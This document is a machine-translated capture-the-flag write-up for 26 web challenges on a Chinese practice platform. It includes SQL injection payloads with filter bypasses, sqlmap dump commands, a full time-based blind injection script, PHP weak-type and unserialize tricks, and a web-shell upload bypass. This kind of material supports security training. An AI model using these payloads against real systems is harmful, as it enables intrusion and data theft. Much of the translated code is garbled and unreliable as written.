Experimental bar web question (26/26) Full writeup! Super Detail:)

Source: Internet
Author: User
Tags php session sha1 vars hex code

#简单的SQL注入

http://www.shiyanbar.com/ctf/1875

1) Try to id=1, no errors.

2) Try to id=1 ', error, there is echo, indicating that there are injection points:

You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the Rightsyntax-to-use near "" at line 13) first expect the background table to be named FL AG, so the structure of the Union select Flag from FLAG4) is based on the second part of the judgment, so add a ', the following statement needs another ' to end, the injection statement is? id=1 ' union Select flag from flag where ' t ' = ' T-ECHO is: You had an error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' t ' = ' t ' in line 1
Analysis: According to the error, only the variables, the other keywords are not filtered 5) The keyword From,where write two times to try, the result error: corresponds to your MySQL server version for the right syntax to use n Ear ' Unionselectflag fromflag where ' t ' = ' t ' in line 1 found space is filtered! 
6) Use the ' + ' sign instead of a space:? Id=1 ' +union+select+flag+from+flag+wherewhere+ ' t ' = ' t

#简单的SQL注入之2

http://www.shiyanbar.com/ctf/1908

1. Normal display id=1, id=2, id=3 show normal description only three lines

2.id=1 ' show MySQL statement error probably judge MySQL statement for select name from user where id= ' input '

3.id=1 ' In the middle there is a space showing SQLi detected! Description space is filtered

Combined with these three kinds of displays, we can tell that the 1 interface plus our SQL statement can actually execute the injection statement we want to execute.

Keep the simple judgment.

Id=1 '%0band%0b ' 1 ' = ' 1%0b indicates a space and there are similar%0a-%0z +/**/can try

Show Normal

Id:1 ' and ' 1 ' = ' 1name:baloteli

and continue the test.

It's good to find this logical method.

? id=1 ' | |  ' ID ' | | ' You can display the data in the table and then the statement is the select name from the user where id= ' 1 ' | |  ' ID ' | | ' closed want to show all the records in the table can add a few more | | ' As long as the statement is closed, you can

Id:1 ' | | ' ID ' | | ' Name:baloteli
Id:1 ' | | ' ID ' | | ' Name:kanawaluo
Id:1 ' | | ' ID ' | | ' Name:dengdeng

And then continue to combine web1 we can guess there's a flag table.

Find the hex code to get it done.

? id=1 '/*!u%6eion*//*!se%6cect*/flag/*!from*/flag/*!where*/' = '

Direct Getflag

#简单的SQL注入之3

http://www.shiyanbar.com/ctf/1909

The subject, I only use SQL map to solve;

1) construct SQL MAP command: sqlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--dbs

Ran all the way down to get the database

2) re-construct the correct database: Qlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--current-db

3) construct again to get the table name: Sqlmap-u "Http://ctf5.shiyanbar.com/web/index_3.php?id=1"--tables

4) construct again to find the column in the flag table name: Sqlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--COLUMNS-T "flag"

5) construct the dump again: Sqlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--dump-c "flag"-t "flag"

Tips: If SQL map runs quickly, it is recommended to use SQL map, but mastering manual injection is the kingly way.

#天下武功唯快不破

http://www.shiyanbar.com/ctf/1854

First look at the source code

Let's submit the found key for post submission, and look at the request header

Flag is found, of course, the key when the parameter is submitted to the solution of the flag to post, but must be fast, then only the script, the following is attached script

Import requests
Import Base64

url = ' http://ctf5.shiyanbar.com/web/10/10.php '

rs = requests.get (URL). headers[' FLAG ']

v = base64.b64decode (RS)

Print requests.post (url=url,data={' key ': V.split (': ') [1]}). Content

Tips: For non-requests modules and Base64 modules can be pip download, not PIP can refer to my previous blog

#拐弯抹角

http://www.shiyanbar.com/ctf/1846

According to this passage, add index.php after the URL to get flag

#Forms

http://www.shiyanbar.com/ctf/1819

F12 View Source Code First

Find the value of Showsource to 0, change to 1, get hidden source code

Appear

if ($a = =-19827747736161128312837161661727773716166727272616149001823847)

Change the value of the PIN to

#天网管理系统

http://www.shiyanbar.com/ctf/1810

First right click to view source code (manual funny

Here we are asked to enter a string, after MD5 equals 0, which is the test of PHP weak type. Here I provide 4 values that can be passed;

Then Baidu 0 start of the md5:http://www.mamicode.com/info-detail-1719711.html

Enter one of the display in the user name

then you know;

Open the link:

$unserialize _str = $_post[' password '); $data _unserialize = unserialize ($unserialize _str); if ($data _unserialize[' user '] = = '??? ' && $data _unserialize[' pass ']== '??? ') {Print_r ($flag);} The great scientist Php dialect way: Into also Boolean, defeated also Boolean. Go back to the tart years.

This code is not difficult to understand, that is, the post submitted by the password value of "deserialization" to get an array, requiring the array of user and pass are satisfied, print flag, but we do not know '??? ' is what, but we can notice that the information is used in the judgment condition = =, is also the PHP weak type;

<?php if (true== "Pcat") {echo "OK";}?>

True of type bool is equal to any string that can be weakly typed, and when there is unserialize or Json_decode in the code, we can construct the bool type to achieve deception. Now we construct an array, inside Han 2 elements, the user and pass, respectively, is the bool type of true, so we get
A:2:{s:4: "User"; B:1;s:4: "Pass"; b:1;}
(a means array,s represents string,b on behalf of BOOL, and the number represents the number/length)

Finally, you can submit it by post in the Password area field.

#Once more

http://www.shiyanbar.com/ctf/1805

A simple code audit problem, according to the IF statement requirements, password must be greater than 9999999 and also equal to *-*

OK, just construct password, password=1e8%00*-*.

(Note:%00 is simply added in the number "-" will be meaningless, after using%00 truncation, plus *-*

Look back to flag,over!

#Guess Next Session

http://www.shiyanbar.com/ctf/1788

This topic needs to use the Firefox browser, then the next Firefox plugin, the cookie manager+

The usual, first look at the source code

Indicates that the value obtained by get must be equal to the value of the session.

Using cookies managers +, delete php session

Direct guess

#FALSE

http://www.shiyanbar.com/ctf/1787

  1. <title>level1</title>
  2. <link rel=' stylesheet ' href=' style.css ' type= ' text/css ' >
  3. <body>
  4. <?php
  5. Require ' flag.php ';
  6. if (Isset ($_get[' name ") and isset ($_get[' password '])) {
  7. if ($_get[' name '] = = $_get[' password '))
  8. Print ' Your password can not is Your name. ';
  9. Else if (SHA1 ($_get[' name ') = = = = SHA1 ($_get[' password ']))
  10. Die (' Flag: '. $flag);
  11. Else
  12. Print ' <p class= ' alert ' >invalid password.</p> ';
  13. }
  14. ?>
  15. <section class="Login" >
  16. <div class="title" >
  17. <a href="./index.txt" >level 1</a>
  18. </div>
  19. <form method="Get" >
  20. <input type="text" required name="name" placeholder="name"/><br/>
  21. <input type="text" Required name="password" placeholder= "password"/><br/>
  22. <input type="Submit"/>
  23. </form>
  24. </section>
  25. </body>

Parsing the code logic, found that get two fields name and password, the condition to get the flag requirement is: Name! = password & SHA1 (name) = = SHA1 (password), at first glance it seems impossible, You can actually use the SHA1 () function to bypass the vulnerability. If these two fields are constructed as an array, such as:? Name[]=a&password[]=b, the two arrays are indeed different when judged at the first, but when judged at the second place, the SHA1 () function cannot handle the array type, the error is returned and the false,if condition is set. Get flag.

#上传绕过

http://www.shiyanbar.com/ctf/1781

Chopper, a word trojan OK

#what a fuck! What the hell is this?

Http://www.shiyanbar.com/ctf/56

Very characteristic, jother encoded, a bunch of parentheses. Can be decoded online, but for offline exams, in Chrome browser, F12, there is a console, paste all code, enter, eject key

#这个看起来有点简单

Http://www.shiyanbar.com/ctf/33

Using SQL injection

Federated Lookup

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,1

Check the database

Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,SCHEMA_NAME%20from%20information_schema.SCHEMATA

Guess table name

Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,TABLE_NAME%20from%20information_schema.TABLES

Guess Field

Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,COLUMN_NAME%20from%20information_schema.COLUMNS

K0y most suspicious, so submitted

Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey

#头有点大

Http://www.shiyanbar.com/ctf/29

Firefox or Chrome F12

Click Edit and re-send, edit the information, modify the language, and add a. NET Framework 9.9, which is adding. NET CLR 9.9 (with a semicolon)

Send and preview

#Forbidden

Http://www.shiyanbar.com/ctf/21

F12, select Network, then reload, click Edit and send

Modify ZH-CN to Zh-hk

Flag can be seen on the preview page after sending

#猫捉老鼠

Http://www.shiyanbar.com/ctf/20

Based on the topic "catch", use Burpsuite to grab the packet and send the packet capture data to the repeater

Click Go directly, look at the response output, find the following line in the table header prompt

After copying "mtq4odg2oda4ma==", replace the previous input 123 in Repeater, view response, and find that the key has been obtained.

#登录一下好吗?

http://www.shiyanbar.com/ctf/1942

Explained below:

Calculate username= ' TG ' in the general database can not have my nickname (if any, you will change a string), so here the return value is 0 (equivalent to false)
and then 0 = "What about the result?" See here The estimate you also understand, just return 1 (equivalent to TRUE)

So this injection is equivalent to
SELECT * from user where 1 and 1
Also equals select * from user
(This problem only filtered out the results have more than 3 to show flag, did not always say "sorry, no this user!! ”)

OK, keep nagging, the comparison above is a weak type of comparison,
The following conditions will be true
1= ' 1 '
1= ' 1.0 '
1= ' 1 followed by a letter (and then a number can also be) '
0= ' except for strings that start with a non-0 digit '
(Overall, as long as the previous 0, to make the statement is true is very simple, so this question of the universal password as long as I have the above way to write a lot)

#who is that you?

http://www.shiyanbar.com/ctf/1941

Time injection, do not know how to search Baidu, I directly on the script not BB

Import requests
Import time
Import Sys

url = ' http://ctf5.shiyanbar.com/web/wonderkun/index.php '

Def retrivecurrentdatabase ():

ASCII =-1
index = 1
result = ""

While ' \x00 ' not in result:

ASCII = 0

For I in range (8):

sql = "222" and (case when (ASCII (SUBSTRING (select Database ()) from%d for 1) &%d!=0) then sleep (0.5) Else sleep (0) E nd) and ' 1 ' = ' 1 "% (index, POW (2, i))
headers = {' x-forwarded-for ': SQL}
StartTime = Time.time ()
Requests.get (URL, headers=headers)

if (Time.time ()-StartTime) > 0.5:

ASCII + = POW (2, i)

If CHR (ASCII)! = ' \x00 ':
Sys.stdout.write (Chr (ASCII))
Result + CHR (ASCII)

Index + = 1

return result

def retrivetable (database):

Database = "'" + Database + "'"

ASCII =-1
Row = 0
While True:

index = 1
result = ""

While ' \x00 ' not in result:

ASCII = 0

For I in range (8):

sql = "222" and (case when (ASCII (SUBSTRING () (select table_name from information_schema.tables where table_schema=%s limit 1 offset%d) from%d to 1) &%d!=0) then sleep (0.5) Else sleep (0) end) and ' 1 ' = ' 1 '% (database, row, index, POW (2, i))
headers = {' x-forwarded-for ': SQL}
StartTime = Time.time ()
Requests.get (URL, headers=headers)

if (Time.time ()-StartTime) > 0.5:

ASCII + = POW (2, i)

If CHR (ASCII)! = ' \x00 ':
Sys.stdout.write (Chr (ASCII))
Result + CHR (ASCII)

Index + = 1

if result = = ' \x00 ':
Break
ASCII =-1
Print (")
Row + = 1

Def dumpcolumn ():

ASCII =-1
Row = 0
While True:

index = 1
result = ""

While ' \x00 ' not in result:

ASCII = 0

For I in range (8):

sql = "222" and (case when (ASCII ((select flag from flag limit 1, offset%d) from%d to 1) &%d!=0) then Slee P (0.5) else sleep (0) end) and ' 1 ' = ' 1 '% (row, index, POW (2, i))
headers = {' x-forwarded-for ': SQL}
StartTime = Time.time ()
Requests.get (URL, headers=headers)

if (Time.time ()-StartTime) > 0.1:

ASCII + = POW (2, i)

If CHR (ASCII)! = ' \x00 ':
Sys.stdout.write (Chr (ASCII))
Result + CHR (ASCII)

Index + = 1

if result = = ' \x00 ':
Break
ASCII =-1
Row + = 1

def main ():
Database = Retrivecurrentdatabase ()
Print (' \ncurrent database is%s '% database)
Print (' let\ ' see the table name in the database! ')
Database = Database.replace ("\x00", "" ")
Retrivetable (Database)
Print (' let\ ' dump the flag! ')
Sys.stdout.write ("ctf{")
Dumpcolumn ()
Sys.stdout.write ("}")

if __name__ = = ' __main__ ':
Main ()

#因缺思厅的绕过

http://www.shiyanbar.com/ctf/1940

View source to get this thing, change the next URL

Come out with this thing

Here is the post data check, here is not the narrow sense of filtering, just check, check the sensitive characters on the output "water can carry boats, can also be rowing!" ", end.
The main checks are "and" "Select" "From" "where" "union" "Join" "Sleep" "benchmark" "," "(" ") what is commonly used in these SQL.

Database connection This piece has nothing to say. The next is to $_post[' uname ' directly into the SQL query interest table. Verifies that the query result is a row, and if the PWD column value of the query results is compared to $_post[' pwd ', the output flag is the same as the same.
The program seems to be quite simple, and the logic is clear. To get flag, two conditions are judged: mysql_num_rows ($query) = = 1 and $key[' pwd '] = = $_post[' pwd '].
Believe that there are individuals, code are not looking directly out of the Sqlmap, read the code, not recommended to do so, the benefits are very little ah. Look at the input check and you'll know.
Imagine if you control the results of the query with the Union SELECT, then the $key[' pwd ' and $_post[' pwd ' are all in our control, but the key to this path is through the input check. I tried a lot of methods manually, tried the input check, found in vain. Look at the code again, think of it, this check method, seems to be unable to check.
The strategy was then re-adjusted. We want to have two conditions to judge, from this point of fact the first condition is very good judgment: X ' or 1 limit, this is the first check. Then look at the second check $key[' pwd '] = = $_post[' pwd ']. Because we can't get the data in the database, at least I can't get it. It is only possible to control the $key[' pwd ' in this condition. I groped for a long time, almost gave up, and asked Pcat if there was anything to do here. The answer is yes, and gives some hints. Finally determine the target to make $key[' pwd '] null. But the input check is very strict, went to commas, parentheses and so on. To reach the goal, I looked through the MySQL handbook. The process is long and not due to lack of thought. The contents of the handbook are always in the mind during breakfast. After breakfast, I thought of the place to use. GROUP BY with Rollup.
X ' or 1 group by PWD with Rollup #

Finally according to PWD Null,playload:x ' or 1 group by PWD with rollup limit 1 OFFSET

#让我进去

http://www.shiyanbar.com/ctf/1848

Extended attack with hash length, principle, search Baidu, I'm not in this BB

Recommended first look at this link: http://www.cnblogs.com/pcat/p/5478509.html

This method has been introduced in detail, I will not repeat the

#忘记密码了

http://www.shiyanbar.com/ctf/1808

First Ctrl+u View the page source code: You can see the admin "[email protected]" editor for Vim.

Randomly lose one, pop-up JS box prompt password in step2.php. Then directly open the step2.php, found to jump back to step.php. Forget it, just use Fiddler to see it, sure enough is a 302 redirect. Then visit step2.php, in fact, it is built-in [email protected] sent to the submit.php. Then we revisit submit.php, which shows "you're not a admin".

This method does not work, looked at other people's writeup, said that vim will produce temporary files. Then we have access to the. Submit.php.swp in the browser, and sure enough there are files. Although there is garbled, but the code barely read. What is needed here is the EmailAddress and token two parameters. EmailAddress is just a, and token made a judgment, must be 0 and the length of 10.

Change Url:http://ctf5.shiyanbar.com/10/upload/[email protected]&token=0000000000

#NSCTF web200

http://www.shiyanbar.com/ctf/1760

The topic is a PHP encryption, we counter on the line

$DD = "A1zlbgqsceseiqrlwuqaymwlyq2l5vwbxqga3rqayumz0tmmvsgm2zwb4tws"; $s =str_rot13 ($DD); $a =strrev ($s); $b =base64_ Decode ($a); for ($e =0; $e {$g =substr ($b, $e, 1); $temp =ord ($g)-1; $g =chr ($temp); $aa = $aa. $g;} echo Strrev ($AA);? >

#程序逻辑问题

Http://www.shiyanbar.com/ctf/62

The problem is still stuck for hours,

The final playload:

User=1 Union Select concat (' BCBE3365E6AC95EA2C0343A2395834DD ')%23 &pass=222

At first I thought injected, and finally injected out to find the PW field is 111

So I tried the weak type and found nothing soft.

Finally think of union query

Select username from admin where ID =-1 Union select concat (' BCBE3365E6AC95EA2C0343A2395834DD ')

Principle: When no user with ID-1 is displayed, the Union statement is BCBE3365E6AC95EA2C0343A2395834DD

222 of MD5

At the same time, submit the pass=222 to the Golden Flash.

#PHP大法

Http://www.shiyanbar.com/ctf/54

You can tell by reading the code in Http://ctf5.shiyanbar.com/DUTCTF/index.php.txt

If the ID equals "HACKERDJ", the flag is not received, but after the decoding, the "HACKERDJ" is required.

So the first decoding is not "HACKERDJ", and the second time is "HACKERDJ", so encode two times just fine

(Do not need all the code, just find a letter, such as the last j->%254a can)

Http://ctf5.shiyanbar.com/DUTCTF/index.php?id=hackerD%254A

#貌似有点难

Http://www.shiyanbar.com/ctf/32

Open Burp intercept a request, add an X field to the HTTP header 1.1.1.1 forward.

Then you can see the key.

#看起来有点难

Http://www.shiyanbar.com/ctf/2

SQL injection, very simple, but run slowly, unexpectedly is 50 points, do not know where the extraordinary

The question is no problem, it is frighten people, it should be so, to believe in themselves, do not be confused by the things in front of you.

Under Remembrance

Experimental bar web question (26/26) Full writeup! Super Detail:)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.